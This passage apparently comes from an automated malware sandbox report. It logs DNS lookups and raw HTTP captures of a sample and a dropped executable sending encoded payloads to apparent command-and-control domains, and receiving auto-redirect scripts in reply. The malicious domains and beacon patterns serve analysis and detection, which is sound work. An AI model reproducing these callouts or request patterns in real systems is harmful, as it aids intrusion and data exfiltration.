                                                                            Jan 11, 2025 03:29:54.040798903 CET1.1.1.1192.168.2.80xf478No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 11, 2025 03:29:54.040798903 CET1.1.1.1192.168.2.80xf478No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:29:54.040798903 CET1.1.1.1192.168.2.80xf478No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:29:54.040798903 CET1.1.1.1192.168.2.80xf478No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:29:54.040798903 CET1.1.1.1192.168.2.80xf478No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:30:07.740356922 CET1.1.1.1192.168.2.80xa812No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:30:41.876156092 CET1.1.1.1192.168.2.80x5c6No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 11, 2025 03:30:41.876156092 CET1.1.1.1192.168.2.80x5c6No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 11, 2025 03:30:41.876156092 CET1.1.1.1192.168.2.80x5c6No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:31:55.318609953 CET1.1.1.1192.168.2.80x6bbNo error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:08.960033894 CET1.1.1.1192.168.2.80x7da6No error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:08.960033894 CET1.1.1.1192.168.2.80x7da6No error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:22.248383999 CET1.1.1.1192.168.2.80x7094No error (0)www.rgenerousrs.store188.114.97.3A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:22.248383999 CET1.1.1.1192.168.2.80x7094No error (0)www.rgenerousrs.store188.114.96.3A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:35.726413012 CET1.1.1.1192.168.2.80x4055No error (0)www.t91rl7.pro154.88.22.101A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:49.276887894 CET1.1.1.1192.168.2.80x272cNo error (0)www.learnwithus.site209.74.77.107A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:02.583733082 CET1.1.1.1192.168.2.80x514cServer failure (2)www.cuthethoi.onlinenonenoneA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:11.325858116 CET1.1.1.1192.168.2.80x376eNo error (0)www.rafconstrutora.online104.21.48.1A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:11.325858116 CET1.1.1.1192.168.2.80x376eNo error (0)www.rafconstrutora.online104.21.32.1A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:11.325858116 CET1.1.1.1192.168.2.80x376eNo error (0)www.rafconstrutora.online104.21.64.1A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:11.325858116 CET1.1.1.1192.168.2.80x376eNo error (0)www.rafconstrutora.online104.21.112.1A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:11.325858116 CET1.1.1.1192.168.2.80x376eNo error (0)www.rafconstrutora.online104.21.96.1A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:11.325858116 CET1.1.1.1192.168.2.80x376eNo error (0)www.rafconstrutora.online104.21.16.1A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:11.325858116 CET1.1.1.1192.168.2.80x376eNo error (0)www.rafconstrutora.online104.21.80.1A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:26.989151001 CET1.1.1.1192.168.2.80x8783No error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:26.989177942 CET1.1.1.1192.168.2.80x8783No error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:26.989207029 CET1.1.1.1192.168.2.80x8783No error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:40.879465103 CET1.1.1.1192.168.2.80xb37dNo error (0)www.duwixushx.xyz156.251.17.224A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • pywolwnvd.biz
                                                                            • ssbzmoy.biz
                                                                            • www.nb-shenshi.buzz
                                                                            • www.laohub10.net
                                                                            • www.xcvbj.asia
                                                                            • www.soainsaat.xyz
                                                                            • www.amayavp.xyz
                                                                            • www.vayui.top
                                                                            • www.rgenerousrs.store
                                                                            • www.t91rl7.pro

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.84970554.244.188.177802160C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:29:00.699383974 CET361OUTPOST /gprpendvhdrdevgd HTTP/1.1
                                                                            Cache-Control: no-cache
                                                                            Connection: Keep-Alive
                                                                            Pragma: no-cache
                                                                            Host: pywolwnvd.biz
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                            Content-Length: 802
                                                                            Jan 11, 2025 03:29:00.699383974 CET802OUTData Raw: 80 4d 5a 85 01 c3 4f e1 16 03 00 00 c2 c7 e8 dc 06 40 d7 27 01 5b 1a fd 69 6a 78 9e 50 c4 f6 5a c3 35 6c 89 20 7a ed 32 cb 8b ae 4d 1c e4 ee 78 e1 80 7c 52 9f 3d 0a 49 a2 6a 29 54 2a 0c a0 5c ab 48 89 ba 8d ea 6e 4d 7a ac f0 ea f1 bb 47 c9 f2 13
                                                                            Data Ascii: MZO@'[ijxPZ5l z2Mx|R=Ij)T*\HnMzGifI *Z*SL)^0.6b;k3E&=\NqlDT{qsukNt]]whgXEv6gcq<20?BmRn4},hW[
                                                                            Jan 11, 2025 03:29:01.402398109 CET413INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:29:01 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: btst=02690ebe32d452bb9d794491dc48ddb0|8.46.123.189|1736562541|1736562541|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                            Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.84970618.141.10.107802160C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:29:01.829313040 CET358OUTPOST /rosecbcswnrlukq HTTP/1.1
                                                                            Cache-Control: no-cache
                                                                            Connection: Keep-Alive
                                                                            Pragma: no-cache
                                                                            Host: ssbzmoy.biz
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                            Content-Length: 802
                                                                            Jan 11, 2025 03:29:01.829334974 CET802OUTData Raw: 3f 13 40 6c c1 67 f9 67 16 03 00 00 c0 e2 fd 7e b1 df 7f 57 91 7f 0b 51 28 e8 cc 7f d9 1a 60 66 17 a3 2e b7 af 4d bb 9f 12 06 a5 11 91 5a 82 01 06 ee 8e 47 8b 2e 32 e7 98 cb 6e 2f ad cf f2 8f 1f 86 64 46 da 1d e2 82 15 33 fa 53 dd 8f 7f 9a e6 35
                                                                            Data Ascii: ?@lgg~WQ(`f.MZG.2n/dF3S5`}FcmcLZ}#LdC>s|\^^NSXqS*K*A5Yj?*/v-Do3Pdf[K8+$.#ANkiD1T8N8>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.849711161.97.142.144805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:29:37.553262949 CET493OUTGET /xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.nb-shenshi.buzz
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:29:38.153275967 CET1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:29:38 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 2966
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "66cce1df-b96"
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                            Jan 11, 2025 03:29:38.153337002 CET224INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                                                                            Jan 11, 2025 03:29:38.153345108 CET1236INData Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                                                                            Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                                                                            Jan 11, 2025 03:29:38.153469086 CET474INData Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                                                                            Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oops! We couldn


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.84971323.225.160.132805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:29:54.070013046 CET751OUTPOST /sgdd/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.laohub10.net
                                                                            Origin: http://www.laohub10.net
                                                                            Referer: http://www.laohub10.net/sgdd/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 70 33 2f 59 46 49 61 69 64 67 4f 66 6c 37 49 6b 79 33 2f 76 47 50 35 6b 65 33 69 56 42 65 59 48 46 5a 56 50 77 67 3d
                                                                            Data Ascii: jNn=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLep3/YFIaidgOfl7Iky3/vGP5ke3iVBeYHFZVPwg=
                                                                            Jan 11, 2025 03:29:54.559122086 CET533INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 358
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.84971423.225.160.132805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:29:56.612962008 CET771OUTPOST /sgdd/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.laohub10.net
                                                                            Origin: http://www.laohub10.net
                                                                            Referer: http://www.laohub10.net/sgdd/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6e 53 6b 64 66 55 51 32 44 77 64 6d 4a 6c 52 6e 30 2f 32 6d 6c 76 4c 56 63 2b 43 6b 67 77 30 62 6a 33 4c 6b 69 6d
                                                                            Data Ascii: jNn=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGnSkdfUQ2DwdmJlRn0/2mlvLVc+Ckgw0bj3Lkim
                                                                            Jan 11, 2025 03:29:57.143776894 CET533INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 358
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.84971523.225.160.132805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:29:59.158823967 CET1788OUTPOST /sgdd/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.laohub10.net
                                                                            Origin: http://www.laohub10.net
                                                                            Referer: http://www.laohub10.net/sgdd/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 6f 52 48 6b 50 6e 6b 6a 37 67 34 56 6e 63 68 61 66 5a 5a 30 54 73 53 46 70 58 53 31 74 65 34 79 68 46 46 46 49 67 47 55 64 41 31 63 7a 33 46 55 66 57 2b 76 48 35 76 73 49 78 4e 2f 33 54 52 7a 4f 6a 6d 6c 59 32 6e 6f 5a 70 62 48 48 36 30 71 4d 31 54 76 6c 32 6d 4d 4a 2f 6c 49 61 68 6a 43 73 4c 65 5a 37 38 75 45 53 68 51 39 6c 44 2b 52 45 5a 43 5a 64 4d 50 2b 36 53 36 56 4c 59 58 62 34 49 2f 42 61 55 43 6c 2f 73 4a 45 74 43 78 6e 32 4d 57 54 31 32 76 74 31 35 38 75 4e 6b 53 52 52 73 6f 44 [TRUNCATED]
                                                                            Data Ascii: jNn=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8coRHkPnkj7g4VnchafZZ0TsSFpXS1te4yhFFFIgGUdA1cz3FUfW+vH5vsIxN/3TRzOjmlY2noZpbHH60qM1Tvl2mMJ/lIahjCsLeZ78uEShQ9lD+REZCZdMP+6S6VLYXb4I/BaUCl/sJEtCxn2MWT12vt158uNkSRRsoDIuAYXTHq8wi+RtikKYlVcAFtdIfvl3K2pKNWTnEw8UcY4VhS0CYy7OlshfHgArW9u4saxfYEKBS89l6UlWzl3uZ6YnwfLJr02ZgpRFDU4gk1Lt0Rn/RaedHbT4+jMvRqIj0gQhTgfref3qPNUOoKIsRcEJqlJZYmso7XxFuY1Y6BT3z6VdvhSlELfJKgwBGjwQwJE34I4lvbtBZ027M9vmjecvTyb0tPP4A+nr+dgUMZ9AoiMPVwwmMyRzglJiTNRDnOkPDU6nZaud5GJVxBDUVqiIhxmWwhq6vfBzG1lSXRK4TfjDaXR+/ZtLO0B1sz0SpMDCccky0kA5qc04xDSV86DBING2I8HajitVGVHyGwzOokuEX+YXe5ctWdZsxVwIzKzTuT0oHsH26zWUrxQifyqTmxV1VWkSnVEI4+8yWQYMMopTdAgFeSujwE7OJOyG6xQ29HcMTGZX4aWSbSuvhM7tbSm6wFAnemoxyNqsV1dsrhsPgiFrbZomq/sXo7An4ETgUHTjlliGIdXFYvNeyM4TOjWRZpyez/cXoXKxAAo3QIVAwmn7FCnqoRVK/K9YLrNQrX10UAlrdcJvXR9aPZXzS+KZlmcnguh3cA2LsYr36Cb7JsJBMTNeaX24cJePWxrmDxvyeSvqxvkrlaP2d6wNAjFAqybS [TRUNCATED]
                                                                            Jan 11, 2025 03:29:59.683837891 CET533INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 358
